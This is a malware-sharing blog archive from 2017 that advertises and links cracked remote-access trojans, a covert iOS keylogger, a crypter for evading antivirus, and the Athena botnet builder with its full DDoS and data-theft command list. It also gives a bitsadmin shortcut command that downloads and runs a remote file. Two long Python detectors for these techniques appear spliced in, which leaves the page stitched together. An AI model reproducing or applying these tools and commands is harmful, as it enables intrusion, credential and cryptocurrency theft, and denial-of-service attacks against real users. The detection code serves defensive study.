Showing posts with label Malicious Software. Show all posts

Sunday, June 25, 2017

SkyWyder RAT - CRACKED - TeamViewer Hidden, FormGrabber, Botkiller, Keylogger, Disabler, Antis, Custom Message









Features:
NEW: hidden TeamViewer, tested on XP/Vista/Win7/8/10 x86 and x64!
- Startup entry hidden from Regedit and msconfig. Persistent installation
- Cryptochange: automatically replaces any Bitcoin address copied to the clipboard with your own
- SkyWyder RAT is able to bypass any firewall
- Multiple DNS connections: if one of your addresses is not reachable, the RAT will automatically connect to the next

Formgrabber:
- Very easy to use: just enter a URL and that's it. The Formgrabber takes care of recovering all the form data and will also take a screenshot for each login made and each click on the URL in question
- Download screenshots and logs from a friendly menu
- Capture date of screenshots
- FULL URL of the captured website
- Intelligent keylogger, works only when you need it
- You will be able to download only the screenshots you need

Botkiller:
- Currently our RAT can kill this list of malware, including from memory. No matter if the file is crypted, the RAT will detect and kill it quickly without using any % of CPU.

Keylogger:
- The keylogger is hooked in Ring3, so it never misses a single piece of data; the entire keyboard is hooked without any ms of delay.

Disabler:
- Disables the following programs (without administrator rights!)
(Regedit, CMD, MsConfig, TaskMgr, RestoreSys)

BTC-E code capture:
- Captures BTC-E codes in real time and sends them to you very fast, with a sound notification.

AntivirusKiller:
- With administrator rights our RAT can kill this list of antivirus products using a .SYS file from memory (you can also use the UAC bypass with this option)

Fake Message:
- You can configure the title, message, icon and buttons of the fake message, and also test it beforehand.



To register the OCX files and fix the "missing OCX" errors:
1. Open a CMD as administrator.
2. Navigate to the SkyWyder folder.
3. Type "regsvr32 ocxname".
4. Repeat this for every OCX file included in the folder.

Credits go to lostit

DOWNLOAD: SkyWyder - Cracked.rar

[K] iKeyMonitor keylogger for iPad/iPhone/iPod 3.6.2-47


iKeyMonitor is an iOS keylogger for iPhone/iPad/iPod Touch that logs keystrokes, passwords,
SMS/WhatsApp, websites and screenshots, and automatically sends the logs to you by email or FTP.

  • Log keystrokes typed in any app
  • Log passwords in any app
  • Log SMS (text messages)/WhatsApp
  • Log websites visited in Safari
  • Capture screenshots at any interval
  • Send logs to email/FTP automatically
  • Secret monitoring in stealth mode
  • Works on iPad/iPhone/iPod Touch
  • Password protected
  • Turn monitoring on/off remotely

After installation, please open Safari and enter http://localhost:8888 to access the keylogger



In this Version (3.6.2-47) changelog:
  • Fixed keystroke logging support for Viber, Kik, Kakao Talk, QQ, VK etc.
  • Fixed bug of "upload logs only by wifi"
  • Fixed some crash/safe mode/auto restart bugs caused by FTP
  • Improved ftp delivery
[NOTE] To activate, simply input some numbers as the registration key (example: 12345678).
If after entering the registration key you get prompted for a password (but you've never set one), just close the page and open it again.

[CREDITS] Thanks Fabius for the License!

DEPENDS: cydiasubstrate, zip


Monday, June 19, 2017

TRILLIUM CRYPT RELOADED |FUD|NO DEPENDENCY|POLYMORPHIC|PROTECT PROCESS|Anti-MemScan



- Download this pack
- Unzip it into one folder
- Open the "OCX files" folder and run the exe
- Go to the hosts file (c:\windows\system32\drivers\etc) and add "127.0.0.1 electronicarts.pe.hu"
- Open HWID READER.exe
- Generate the HWID with a random name (doesn't matter) and copy just the HWID (the alphanumeric part, like "BFEBFBFF000006FB1653284762")
- Copy it into hwid.txt in the "area" folder
- Open mongoose, which you will find in the rar
- Right-click on the icon you will find in the system tray and click on advanced settings
- Change listening_port to 80
- Restart mongoose
- Open the program and enjoy it!

I'm not 100% sure about the genuineness of the file I was provided; it could or could not be infected by the same crypter. I used a VM to crack it, so be careful and use one too!

DOWNLOAD AND EXECUTE (NEW METHOD 100% FUD)

It seems I'm the first who found such a method to download and execute any file.
It was very obvious, but it seems nobody ever thought about it.
First of all, here is a demonstration video on YouTube:


How does it work?

Well, it simply uses a shortcut to start a new Windows shell with two command lines:

  • One to download a remote file
  • A second to execute the temporarily downloaded file

Do it manually:
Just create a new shortcut from your desktop, then enter the following as the target:
cmd.exe /C "%windir%\system32\bitsadmin.exe /transfer downloader /priority normal http://example.com/test.exe %temp%\tmp.exe & %temp%\tmp.exe"
As you can see, the shortcut executes the Microsoft program bitsadmin in transfer mode to download a remote file and store it in the temp folder.

Then it will run it.

It is not finished: now set the shortcut to run minimized.

And you can change the icon to any icon you want (better to use an icon index from shell32.dll, located in the system32 folder).

Have fun!

You can do a lot of interesting things with bitsadmin; I have many other methods to exploit file downloading using this technique, and will write other examples later :)

Do it automatically (lazy method):

As in the above video, download the attached application and voilà!
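The defender's side of the technique described in this post, as an added example that is not part of the original post: a triage helper that runs over process-creation command lines (for instance the CommandLine field of Sysmon Event ID 1 or Windows event 4688) and flags a bitsadmin /transfer or /addfile that pulls a remote URL to a local path, noting whether the same cmd.exe chain then launches that path. The shortcut in the post is logged as a single cmd.exe command line, which is the first constructed sample below; the other samples are constructed too, and the detection does not depend on any particular log format.

```python
"""Flag bitsadmin download-and-execute chains in process command lines."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Command separators cmd.exe honours between the download and the launch.
# Caveat: a URL carrying '&' in its query string would also be split here.
CHAIN_SPLIT = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")
URL_RE = re.compile(r"(?i)(?:https?|ftp)://\S+")
# bitsadmin / bitsadmin.exe as a program name, with or without a leading path
BITS_RE = re.compile(r"""(?i)(?:^|[\\\s"'])bitsadmin(?:\.exe)?(?=[\s"']|$)""")
# bitsadmin verbs that write a remote resource to a local path
DOWNLOAD_VERBS = {"/transfer", "/addfile"}


@dataclass
class Finding:
    url: str          # remote source handed to bitsadmin
    destination: str  # local path it writes (env vars left unexpanded)
    executed: bool    # True if that path is launched later in the same chain


def _tokens(segment: str) -> List[str]:
    """Crude Windows tokenizer: keep quoted runs together, drop the quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', segment)]


def detect_bitsadmin_dl_exec(cmdline: str) -> Optional[Finding]:
    """Return a Finding for the first bitsadmin download in cmdline, else None."""
    segments = CHAIN_SPLIT.split(cmdline)
    for i, seg in enumerate(segments):
        if not BITS_RE.search(seg):
            continue
        toks = _tokens(seg)
        if not (DOWNLOAD_VERBS & {t.lower() for t in toks}):
            continue  # e.g. "bitsadmin /list": administrative, not a download
        m = URL_RE.search(seg)
        if not m:
            continue  # local-only transfer; not the technique described
        url = m.group(0).strip('"')
        pos = [j for j, t in enumerate(toks) if t.lower() == url.lower()]
        if not pos or pos[0] + 1 >= len(toks):
            continue  # URL is the last token: no destination to track
        dest = toks[pos[0] + 1]
        later = (_tokens(s) for s in segments[i + 1:])
        executed = any(t and t[0].lower() == dest.lower() for t in later)
        return Finding(url=url, destination=dest, executed=executed)
    return None


def scan(cmdlines: List[str]) -> List[Finding]:
    """Run the detector over many command lines, keeping only hits."""
    return [f for f in map(detect_bitsadmin_dl_exec, cmdlines) if f]


# Constructed sample command lines (not real telemetry).
SAMPLE_CMDLINES = [
    # the shortcut target from the post, as cmd.exe itself would be logged
    r'cmd.exe /C "%windir%\system32\bitsadmin.exe /transfer downloader /priority normal '
    r'http://example.com/test.exe %temp%\tmp.exe & %temp%\tmp.exe"',
    # bitsadmin logged as its own process, variables expanded, no launch in chain
    r"C:\Windows\system32\bitsadmin.exe /transfer job1 /download /priority foreground "
    r"http://example.com/payload.bin C:\Users\u\AppData\Local\Temp\p.bin",
    # benign administrative use: no download verb, no URL
    r"bitsadmin.exe /list /allusers",
    # the word appears inside a file name only
    r"notepad.exe C:\notes\bitsadmin_howto.txt",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{'EXEC' if f.executed else 'DL  '} {f.url} -> {f.destination}")
```

When bitsadmin is logged as its own process (second sample) the launch shows up as a separate process-creation event, so correlate a `DL` hit with a later process whose image path equals the destination; the `EXEC` case only appears when the whole chain is passed to cmd.exe, exactly as the shortcut does.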



[RELEASE] DARKZONE ICON CHANGER | 2 METHODS! [STABLE]

Hello. I just made this simple icon changer using Delphi. It has 2 methods to support all executable files,
and of course no dependencies to run, so it will work on all Windows machines.

DarkZone Icon Changer is a tool that helps you customize the icon of an executable file (.exe).


VirusTotal scan (false positives, don't worry!)
https://www.virustotal.com/en/file/693e855b907fd2825806f56eb493581494f03bb72cfb30d8a460673ba7632d03/analysis/1481853463/

How to use:
--------------------------------------
1- Choose an executable file (.exe)
2- Choose an icon file (.ico)
3- Choose the icon replacing method (sometimes method 1 doesn't work, so choose 2, and vice versa!)
4- Click Apply to make the changes!
--------------------------------------

Download:
DarkZone - Icon Changer.rar
Rar Password: DarkZ0Ne.NET


Always check these MD5 and SHA1 hashes of DarkZone Icon Changer.exe to make sure it's legit and not infected by other users/websites. ^^
DarkZone Icon Changer.exe
MD5: F324AAB79F80F9BE3261CD5F5D36AA41
SHA1: 56E968FD8FFD32B3BAB9A80264E1DFE9681E69DC

Enjoy ^^.

Sunday, June 18, 2017

Athena IRC Builder v2.4.0


Features of Athena
 - 10 Intense methods of DDoS
 - Anti-botkiller
 - Independent; requires no .NET framework or any 3rd party libraries
 - File searching and stealing system
 - SmartView (system for giving realistic looking views to your website or the like - ads, youtube, etc)
 - IRC War Attacks/Flooding
 - Multiple (different) methods of startup (registry and non-registry)
 - File, registry, and process persistence
 - Botkill (active botkilling, scans based on heuristics)

IRC Related Commands
!irc.join #channel [key] - Joins a channel
!irc.part #channel - Parts a channel
!irc.raw - Submit a RAW IRC command
!irc.reconnect - Reconnects to IRC after waiting 15 seconds
!irc.silent on/off - Toggles bot output to channel
!irc.sort.country - Separates bots based on location
!irc.sort.privelages - Separates bots based on Admin/User privileges
!irc.sort.gender - Separates laptops and desktops
!irc.sort.os - Separates bots based on operating system
!irc.sort.architecture - Separates bots based on architecture
!irc.sort.dotnet - Separates bots by version of .NET Framework installed

DDoS Commands
[Port 80 is most common for websites]
!ddos.http.slowloris - Attacks a target webserver with many concurrent connections
!ddos.http.rapidget - Sends mass amounts of randomized GET packets to a given target
!ddos.http.rudy - Slowly posts content by the masses to a target webserver
!ddos.http.rapidpost - Sends mass amounts of randomized POST packets to a given target
!ddos.http.slowpost - Holds many concurrent connections to a webserver through POST methods
!ddos.http.arme - Abuses partial content headers in order to harm a target webserver
!ddos.http.bandwith - A download-based flood targeted towards larger files and downloadable content on websites
!ddos.layer4.udp - Sends mass amounts of packets containing random data to a target host/ip
!ddos.layer4.ecf - Floods a target with rapid connections and disconnections (Previously named condis) (ECF stands for Established Connection Flooding)
!ddos.stop - Ends any currently running DDoS
(Example: !ddos.http.rapidget  http://website.com/ 80 300)

!ddos.browser http://website.com/ 60 - Floods a website through html scripts and hidden browsers. Effective against sites heavy on browser based scripts.
!ddos.browser.stop - Ends any currently running Browser Based DDoS

!http.hostblock website.com - Blocks a host
!http.status http://website.com/ - Outputs the current status of a given URL (ie. 200 OK, 302 Found, 404 Not Found, etc)


File Searching, Stealing, and Modification Commands
!ftp.upload C:\Archive.rar ftphost.com ftpuser ftppass - Uploads a given file to a given FTP server
!filesearch .exe - Searches the entire bot computer for a given file name or piece of a file name, and outputs how many instances of it occurred
!filesearch.output .rar - Functionality is the same as above, but the bot outputs the file path of the searched item
!filesearch.stop - Ends any of the three types of file search above

Website View Commands
!view http://website.com/ - Views a given website in a random existing browser visibly
!view.hidden http://website.com/ - Views a given website in a random existing browser hidden
!smartview.add http://website.com/ 1080 300 - Adds a given URL to the 'SmartView' queue
!smartview.del http://website.com/ - Deletes a given URL from the 'SmartView' queue if it exists
!smartview.clear - Clears the entire 'SmartView' queue

Recovery Commands
!recovery.ftp - Outputs existing FTP logins on the bot computer
!recovery.im - Outputs existing IM logins on the bot computer

IRC War Commands
!war.connect irc.server.net 6667 - Connects to a given IRC server with multiple sockets
!war.disconnect - Disconnects from a previously connected IRC server
!war.status - Outputs the number of verified connections to IRC and the status of what the bot is currently doing
!war.raw PRIVMSG #channel :raw message - Submits a RAW IRC command
!war.join #channel channelkey - Joins a channel with an optional key
!war.part #channel part message - Parts a channel with an optional part message
!war.msg user/#channel message here - Sends a message to a given user or channel
!war.notice user/#channel message here - Sends a notice to a given user or channel
!war.invite user - Invites a user to a random channel. Clients that have auto-join on invite are affected badly
!war.ctcp user - Floods a user with CTCP requests. This often disconnects users
!war.dcc user - Floods a user with DCC requests. This often disconnects users
!war.kill.user nickname - Attempts to kill a user from IRC
!war.kill.user.multi nick1 nick2 nick3 - Attempts to kill a list of users from IRC
!war.flood.channel #channel - Floods a given channel
!war.flood.channel.hop #channel - Floods a channel through mass joins and parts
!war.flood.anope - Floods Anope services. Anope will crash if enough bots are used.
!war.stop - Stops an existing flood
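The command reference above is effectively the grammar of Athena's C2 channel: every instruction is a `!family.verb arg ...` line carried in an IRC PRIVMSG. As an added example that is not part of the Athena post, the following parser pulls those commands out of raw IRC lines (a packet-capture payload or a channel log) into structured records, so a network or SOC rule can match on the command family and category rather than on dozens of literal strings. The IRC lines are constructed for the example, and the category labels are this example's own grouping, not Athena terminology.

```python
"""Parse Athena-style IRC C2 commands out of raw IRC traffic."""
import re
from dataclasses import dataclass
from typing import List, Optional

# `:nick!user@host PRIVMSG #chan :payload` (prefix is absent on client->server lines)
PRIVMSG_RE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")
# A bot command is '!' + family, optionally '.' + dotted verb, e.g. !ddos.http.rapidget
CMD_RE = re.compile(r"^!(?P<family>[a-z]+)(?:\.(?P<verb>[a-z.]+))?$")

# Command families from the reference above, mapped to the behaviour they trigger.
# The category names are this example's own labels, not Athena terminology.
FAMILY_CATEGORY = {
    "ddos": "attack",
    "war": "attack",
    "filesearch": "collection",
    "ftp": "exfiltration",
    "recovery": "credential-theft",
    "irc": "c2-control",
    "http": "c2-control",
    "view": "fraud",
    "smartview": "fraud",
}


@dataclass
class C2Command:
    sender: str      # nick from the message prefix, '' if absent
    channel: str
    family: str      # e.g. "ddos"
    verb: str        # e.g. "http.rapidget"; '' for bare commands like !view
    args: List[str]  # positional arguments exactly as sent

    @property
    def category(self) -> str:
        return FAMILY_CATEGORY.get(self.family, "unknown")

    @property
    def name(self) -> str:
        return "!" + self.family + ("." + self.verb if self.verb else "")


def parse_irc_line(line: str) -> Optional[C2Command]:
    """Return a C2Command if the line is a PRIVMSG whose first word is a !command."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None  # numerics, JOIN/PING, etc. carry no bot commands
    words = m.group("text").split()
    if not words:
        return None
    c = CMD_RE.match(words[0])
    if not c:
        return None  # ordinary chatter
    sender = (m.group("prefix") or "").split("!", 1)[0]
    return C2Command(sender, m.group("target"), c.group("family"),
                     c.group("verb") or "", words[1:])


def scan_irc_log(lines: List[str]) -> List[C2Command]:
    """Keep only commands whose family appears in the Athena reference."""
    return [cmd for cmd in map(parse_irc_line, lines)
            if cmd is not None and cmd.family in FAMILY_CATEGORY]


# Constructed IRC lines (not a real capture).
SAMPLE_IRC = [
    ":herder!h@c2.example PRIVMSG #athena :!ddos.http.rapidget http://website.com/ 80 300",
    ":herder!h@c2.example PRIVMSG #athena :!filesearch.output .rar",
    ":herder!h@c2.example PRIVMSG #athena :!war.connect irc.server.net 6667",
    ":someone!u@host PRIVMSG #athena :lol that's not how it works!",
    ":irc.example 001 herder :Welcome to the network",
    ":bot42!b@victim PRIVMSG #athena :!help",  # '!' prefix, but not an Athena family
]

if __name__ == "__main__":
    for cmd in scan_irc_log(SAMPLE_IRC):
        print(f"[{cmd.category}] {cmd.sender} -> {cmd.channel}: {cmd.name} {' '.join(cmd.args)}")
```

Matching on the family keeps the rule stable when the operator renames a verb or adds a new flood method; the unknown-family path is kept separate so ordinary bot-prefixed chatter on the same network does not inflate the attack count.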

Saturday, June 17, 2017

QuasarRAT


Free, Open-Source Remote Administration Tool for Windows

Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.

Features
  1. TCP network stream (IPv4 & IPv6 support)
  2. Fast network serialization (NetSerializer)
  3. Compressed (QuickLZ) & Encrypted (AES-128) communication
  4. Multi-Threaded
  5. UPnP Support
  6. No-Ip.com Support
  7. Visit Website (hidden & visible)
  8. Show Messagebox
  9. Task Manager
  10. File Manager
  11. Startup Manager
  12. Remote Desktop
  13. Remote Webcam
  14. Remote Shell
  15. Download & Execute
  16. Upload & Execute
  17. System Information
  18. Computer Commands (Restart, Shutdown, Standby)
  19. Keylogger (Unicode Support)
  20. Reverse Proxy (SOCKS5)
  21. Password Recovery (Common Browsers and FTP Clients)
  22. Registry Editor
Requirements
  1. .NET Framework 4.0 Client Profile (Download)
  2. Supported operating systems (32- and 64-bit): Windows XP SP3, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2012, Windows 8/8.1, Windows 10
Download: QuasarRAT

NODERAT.IO


Hi ax0ners,

First... my previous thread was removed by error and we lost my last tutorial and all your comments and suggestions, but don't worry, I'll remake it better soon and I'll make a different thread to manage the project faster =]

Description:
Noderat.io is fully coded in nodejs (web server and client); it uses socket.io to exchange data between server and client, and oh yes... it's OPEN SOURCE ;)

Noderat.io is not detectable because it runs as a signed nodejs process recognized as a legitimate application, and it can run on all OSes without modification of the source code because nodejs is multi-platform (all Windows versions, Mac OS, Linux, Android, etc.).

Philosophy:
I want to prove how some new technologies like nodejs and other framework engines like enclose.js, NW.js, cordova, electron, etc. create new security problems often ignored by OSes and AVs at this time (these technologies are very powerful, fast and easy to deploy, and I think it's a good thing for developers, but not enough controlled for the moment by OSes and AVs).

Everyone uses these new technologies and the community grows fast; the problem is that all of these apps are signed legit by all antivirus, so I'll write on this more deeply when the project is more mature.

At the beginning I just wanted to make a remote admin tool as powerful as possible with a real-time web interface using sockets, scalable, cloud-based and easily movable, to control all my servers, Raspberry Pis, Windows machines, Android devices, etc. from one point; I'm tired of TeamViewer :) ..... but .... when I realized what is possible to do while I created my remote administration tool project, I was not able to ignore the security aspect, so I want to know the opinion of the community about this new kind of security risk. So don't forget, it's for educational purposes only ;)

To be sure that everyone has understood -> I don't want to make malware for script kiddies; that's why I won't help anyone to install, edit, or use this for illegal activity :|

Advantages:
- Code once, run on all OSes (cloud and client).
- Easy to code (it's only JavaScript).
- Easy to get help and code as a team with git.
- Easy to edit and test.
- No need for encryption, it's FUD.
- No need for compilation.
- No need for Apache or PHP to run the cloud.
- Lots of modules exist for nodejs; we can manage them with npm and benefit from this whole repository in a few seconds:
- Imagine we need to get control of the webcam: just search "nodejs webcam" on Google and we often get high-quality modules like this.
- Need a file manager? Or an example to make your own? https://www.npmjs.com/package/node-file-manager
- A remote desktop? https://github.com/citronneur/node-rdpjs
- etc... We take advantage of one of the biggest communities of JavaScript developers to add new functionality more easily.

Disadvantages:
- The client code is readable (not compiled), so anyone can reverse your client to get information on you: IP, general password, etc. in clear text with Notepad ^^, so it will be harder to use it for illegal activity, and it's better like this; it will discourage lamers from spreading this as malware :)
- The client size (when compiled) is big (from 12 MB with Enclosejs to 80 MB with NWjs).
- Needs a MySQL server to run the cloud.
- Needs a nodejs environment to run the client.

GitHub repository (latest version: v1.0.1):
https://github.com/mwesto/nodeRat.Io

Screenshot of the latest version: [image not reproduced]

Lost®Door E-Lite v9.1


Lost®Door is back stronger than ever; I proudly present the E-Lite Version 2015.
This is the advanced version of the Lost Door RAT, tested and approved on all Windows versions
from XP to Win 10, with lots of powerful features to control every process
on the remote machine with no errors.....

Lost®Door would not be what it is today without the invaluable help of everybody
who was kind enough to spend time testing it, using it and reporting bugs...
Today Lost Door celebrates 9 years of existence. We control your digital world since 2007.

For bugs & feedback, e-mail: Buypriv8@yahoo.com
For info and help, visit the Blogspot: lost-door.Blogspot.com
Follow on Twitter: @Unique_Oussamio
Facebook page: Facebook.com/ldoorcoder

By UniQue OussamiO - Hackers®Insides Inc.

CHANGE LOG
[+] Cleaner & friendlier interface
[+] Stability improved: 00.00% server losses
[+] Faster connection delay
[+] Client stuck in process while closing: fixed
[+] Icon changer tool added
[+] Minimizing the client is now available (send to tray)
[+] Startup method changed and crypted
[+] Code updated, some replaced by APIs
[+] Data exchange is encrypted
[+] Regrouped essential functions together in the main form
[+] Server size reduced to 46.5 KB
[+] Web browser removed; fixes the error message (Subscript out of range)
[+] Fast settings for server building (predefined settings for beginners)
[+] Stream webcam (fast view)
[+] Upload [new code, faster transfer]
[+] Lost®Door multilanguage support [English, Arabic, French, Spanish, Polish, Italian, Swedish and, for my geek friends, 1337]
If you want to add your own, translate the English file, upload it & post the link on our fan page www.Facebook.com/Ldoorcoder
[+] Tested on: Windows Vista, Windows 7 Ultimate, Professional & Starter, Windows XP & Sweet & Windows 8 - 10, all service packs, 32-bit
[+] All reported bugs were fixed
Lost Door RAT 2007 - 2015